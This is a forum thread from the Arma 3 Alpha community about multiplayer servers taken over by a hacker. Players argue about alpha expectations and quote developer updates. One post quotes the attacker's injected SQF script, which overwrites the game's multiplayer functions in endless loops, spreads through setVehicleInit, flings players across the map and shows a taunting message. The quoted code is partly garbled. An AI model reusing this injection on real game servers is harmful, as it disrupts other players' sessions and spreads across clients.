Sign in to follow this  
Richie

Hacked by a player with no ID

nothing unexpected

the BIS_fnc_MP https://community.bistudio.com/wiki/BIS_fnc_MP

is evolution of TOH's replacement https://community.bistudio.com/wiki/BIS_fnc_MP_(Take_On_Helicopters)

of A2/OA old MPF (multiplayer framework) https://community.bistudio.com/wiki/Multiplayer_framework

as Alpha has no security yet, cheating or exploiting ingame scripting and functions is bound to happen

At least they had the courtesy to just move your post. Mine was simply deleted by the admins. Utterly ridiculous. Even EA does better than this

check my tweet from today ... ;) i'm sure it will not please most, create more questions than answers and someone burn my voodoo doll again but I hope it's more than nothing ;)

Look forward to reading it, any news has to be better than no news.

One thing, I never bothered with twitter, etc. Any chance you or someone else could post up on this site? Under a dev-update section make it a little easier to find.

I assume there are some bits missing from each section?

Section 1:

with missionNamespace do 
{ 
[] spawn 
{ 
	with missionNamespace do 
	{ 
		while {true} do 
		{ 
			'BIS_fnc_MP_packet' addPublicVariableEventHandler {_this call BIS_fnc_MPexec}; 
			BIS_fnc_MP = compile preprocessFileLineNumbers 'A3\functions_f\MP\fn_MP.sqf'; 
			bis_fnc_MPexec = compile preprocessFileLineNumbers 'A3\functions_f\MP\fn_MPexec.sqf'; 
			_recomp = preprocessFile 'a3\functions_f\Debug\fn_recompile.sqf'; 
			_hitter = (uinamespace getvariable 'hitter6'); 
			uiNamespace setVariable ['bis_fnc_recompile', 
			compile format ['%1 [] call %2;', _recomp, _hitter]]; 
			uiNamespace setVariable ['BIS_fnc_playerName', (uinamespace getvariable 'hitter6')]; 
		}; 
	}; 
}; 
}; 
player setvehicleinit " with missionNamespace do 
{ 
[] spawn 
{ 
	with missionNamespace do 
	{ 
		while {true} do 
		{ 
			bis_fnc_MPexec = compile preprocessFileLineNumbers 'A3\functions_f\MP\fn_MPexec.sqf'; 
			uiNamespace setVariable ['bis_fnc_recompile', compile format ['%1 [] call %2;', _recomp, _hitter]]; 
			uiNamespace setVariable ['BIS_fnc_playerName', (uinamespace getvariable 'hitter6')]; 
		}; 
	}; 
}; 
}; "; 
with missionNamespace do 
{ 
[] spawn 
{ 
	with missionNamespace do 
	{ 
		while {true} do 
		{ 
			uiNamespace setVariable ['bis_fnc_recompile', compile format ['%1 [] call %2;', _recomp, _hitter]]; 
		}; 
	}; 
}; 
}; 
with missionNamespace do 
{ 
[] spawn 
{ 
	with missionNamespace do 
	{ 
		while {true} do 
		{ 
		}; 
	}; 
}; 
}; "; 
}; 

Section 2

if !(ismultiplayer) then 
{
["BIS_fnc_MP_packet",
BIS_ [] spawn 
{ 
	player allowDamage false;
	(vehicle player) setVelocity [0, 0, 100];
	sleep 1;
	while {sleep 0.1; true} do 
	{ 
		velVector = [getposASL player, [2000, 5500, 400]] call BIS_fnc_vectorFromXToY;
		velVector = [velVector, 40] call BIS_fnc_vectorMultiply;
		(vehicle player) setVelocity velVector; 
	}; 
}; 
_layer = (floor(random 999999)); 
_ltxt = 'You thought you could get rid of me? Stop trying to play, and go pester BIS to get their act together, and plug this leaky bucket of a game. VE, mute 3.'; 
_layer cutText [_ltxt, 'PLAIN DOWN', 1]; 
_layer cutFadeOut 4096; call compile format ["%1 = '%2';", _layer, _ltxt]; 
[] spawn 
{ 
	player allowDamage false; (vehicle player) setVelocity [0, 0, 100]; 
	sleep 1; 
	while {sleep 0.1; true} do 
	{ 
		velVector = [getposASL player, [2000, 5500, 400]] call BIS_fnc_vectorFromXToY; 
		velVector = [velVector, 40] call BIS_fnc_vectorMultiply; 
		(vehicle player) setVelocity velVector; 
	}; 
}; 
_layer = (floor(random 999999)); 
_ltxt = 'You thought you could get rid of me? Stop trying to play, and go pester BIS to get their act together, and plug this leaky bucket of a game. VE, mute 3.'; 
_layer cutText [_ltxt, 'PLAIN DOWN', 1]; 
_layer cutFadeOut 4096; 
call compile format ["%1 = '%2';", _layer, _ltxt];

Any way to reverse the code, and make it undo itself so to speak?

... because as of today this Alpha has been rendered completely unplayable by hackers and viruses on the servers.

I DEMAND TO KNOW WTF YOU ARE DOING ABOUT IT BECAUSE I DID NOT SPEND 20 QUID TO FIX DAMAGE CAUSED BY IDIOTS AND PISS-POOR SECURITY ON THE SERVERS.

Come on. Stop ignoring these posts and give us answers !

Not sure if you read the posts from the developers, but they are working on it. It is Alpha, it's not so surprising that there are problems. I know it's hard for some people to believe, but there are Trolls out there who get a great deal of satisfaction kicking over an ant hill and watching the ensuing chaos.

... because as of today this Alpha has been rendered completely unplayable by hackers and viruses on the servers.

I DEMAND TO KNOW WTF YOU ARE DOING ABOUT IT BECAUSE I DID NOT SPEND 20 QUID TO FIX DAMAGE CAUSED BY IDIOTS AND PISS-POOR SECURITY ON THE SERVERS.

Its an alpha....you played £20 to play a game before release and help report issues/feedback. If you arent happy that a non-finished game is broken then fool on you for buying an Alpha.....

---------- Post added at 05:06 PM ---------- Previous post was at 05:04 PM ----------

check my tweet from today ... ;) i'm sure it will not please most, create more questions than answers and someone burn my voodoo doll again but I hope it's more than nothing ;)

I wish i could but im at work and cant get on Twitter :(

You couldnt paste it on here could you?

Yes it's really frustrating but being a prick won't make them work faster or release a fix quicker.

Go play something else, It's all you can do :)

Here you go:Also, today's dev build changelog mentions the initial release of some fixes... though this doesn't do anything for stable build.

Dev build didn't change anything :( We're running it now and it was soon infected.

Edited by Richie

At least they had the courtesy to just move your post. Mine was simply deleted by the admins. Utterly ridiculous. Even EA does better than this

This just got me an infraction ! It'd be funny were it not so sad

---------- Post added at 16:18 ---------- Previous post was at 16:17 ----------

Yes it's really frustrating but being a prick won't make them work faster or release a fix quicker.

Best solution of the day lol

We have a modded Domination based on Raveks Ahoy world Dom. Server is located in Seattle. And a second server running a modded Warfare Chernarus based on TeeTimes Warfare. Both servers are password protected until the current hacking issue is fixed and players must either enter Team Speak to get the PW or request it on face book.

Teamspeak channel is "Graves yard" simply search in your server list.

Dev build didn't change anything :( We're running it now and it was soon infected.

BTW exercising my right to complain as a consumer (Alpha or not) is not being a prick mate

Sry then

Edited by Byku

being a prick won't make them work faster or release a fix quicker.
Pretty much where my lack of ire comes from.

For anyone wondering re: the changelog:

Small first of many stages to reduce MP security vulnerabilities: should no longer be needed to restart the whole game to undo the common functions breach. This should also prevent it from spreading (but does not help the current situation on default branch servers of course). More on the topic in the next SITREP.

Yeap, but the way you are doing it makes you a prick :p

"Sigh" I knew it was a waste of time coming here. One always hopes though.

PS don't waste your time replying dickhead I'm logging off

BTW exercising my right to complain as a consumer (Alpha or not) is not being a prick mate

Nobody forced you to buy the alpha you self-entitled brat.

Stop bitching and moaning, get a life and go do something else with your time if you are not enjoying playing the game.

Some infractions and warnings handed out. Maybe some of you need to take a step back, drink some coffee, go out for a walk or whatever?

Yes, this is not a good situation for the Arma 3 Alpha, I fully understand that. But the immature responses of some here really will not make things better for anyone.

Lets see what we can do (if anything) instead of calling eachothers names and what not.

Ow yeah ArmA 3 Alpha :)

Its a New engine, New game? Yes it is!

Talk me about the new Anti cheat... peeeeehhh no New Anti Cheat....

Woooow Its a trap Billy boy!

Ow yeah ArmA 3 Alpha :)

Its a New engine, New game? Yes it is!

Talk me about the new Anti cheat... peeeeehhh no New Anti Cheat....

Woooow Its a trap Billy boy!

It is an Alpha, why would there be anti-cheat implemented when this release is meant for testing & when the full game is not even completed? This alpha is meant to be tested, so naturally things are gonna happen. Whats most important is that these things do happen now so the devs can deal with it and prevent it from happening in the full release. I would much rather something like this happened now in the Alpha rather than in the full game later on.

Edited by Karim

Fred, thanks for the reply! I will try this out! Im more than happy if it works since it will solve some of the issues i have with PVEHs. When i last tested this shizzle it wouldnt work for the life of me, so maybe there has been some changes on that, who knows!

PS: Interesting, my name changed back from raggamafia to highhead (my old forum name, before i had to register to store.bistudio.com), so dont feel irritated

I`m here to report that this stupid hacker still haunts the game. I thought he was right at first but then put some though into it.... It´s an alpha. The developers know that these kind of hacking attacks can happen and they already announced that they wanted to improve hacking security in the first place.

This guy is overdoing it imo.

Discussion has happened and awareness has been built but know this guy could stop and make those that actually like playing an unfinished game able to do so

I repost what I posted in other thread

some of the security fixes needs first to be tested and expanded before they can even reach the stable version, so calling for rush hotfix of stable version isn't good idea in this situation

Obviously I used too many words and hard to understand concepts such as sarcasm. This time I'll just try providing you with the facts:

1. I paid for Arma 3 Alpha through Steam. I did not purchase the full version of Arma 3 with access to the alpha.

2. The 3 invites for Arma 3 Alpha Lite would not allow my friends to play online with me. That wasn't even a fact I was disputing anyway. My point was that you are saying we didn't pay for the Alpha so it must be free to everyone.

3. As a direct quote from the Arma 3 website, source below: "Both versions provide access to the Arma 3 Beta plus a digital version of the complete game upon release. The price of each edition will increase once the Arma 3 Beta and final game become available."

Therefore, I paid for the Alpha. When the full version becomes available, I also get that too. Please stop spreading ignorance.

http://www.arma3.com/news/arma3-alpha-lite-now-available#.UXitP8qC2DM

Would you care to elaborate on that, or are you content with adding nothing of value?

And your point? I was arguing the fact that Messiah said we didn't pay for the Alpha. Thanks for showing a screenshot that clearly shows the Alpha is up for purchase. Although this isn't where I bought my copy, it never hurts to have supporting documentation. Thanks again.

Oh, please, let me be the one who is embarrassed.... for your epic FAIL. I'm well aware of what I bought and paid for, that is, the Arma 3 Alpha. This also entitles me to the Beta and full version once they're available. Have a nice day.

Why be so pedantic? You have nothing to complain about, and you come across as extremely arrogant about the fact that your Alpha is not working. Poor you. It seems you have fallen foul of the English language. What Messiah most likely meant (I can only assume as I do not have psychic powers) is that you have the alpha, beta, and final version all in that price, and this isn't even the end product. So, you should take it for what it is; an alpha. If something's wrong then just know that you also have your beloved beta and final to look forward to. Me? I bought the final game and gained access to alpha and beta... it's all a matter of perspective.

play arma 2 i guess remember folks its all about private hive servers

People need to realize what they paid for, including this Alpha. This is a testing period, and you paid for this testing period so stop complaining that things arent going the way you expected.

Put the msg up that the server would be locked (wednesday and sunday evenings the server is full) if they want to keep playing the needed to get on our TS.

We restarted the server and everybody restarted theire game, locked the server and the server was still full with players, everybody who joined TS was "orderd" to restart the game before joining the game(just to make sure) and we had alot of fun.

I'd love to join you guys! Can you PM your TS address? What timezone are you in?

Yes we all know it´s an Alpha for the love of God :p

But that the game has leaks security wise is not since ArmA 3 Alpha. For Instance, set Vehicle init could be run since OFP.

(My) Fact: BIS needs to solve the Security issues / add the Security Content (and now so you dont get me wrong) BEFORE even adding make-up effects or similar.

All I´m saying is, that we want to test the Game and track down Bugs and give out Suggestions to the Devs so this game will become a Masterpiece. But to do so, we need some sort of basic backbone. And that should contain Security in my honest Opinion!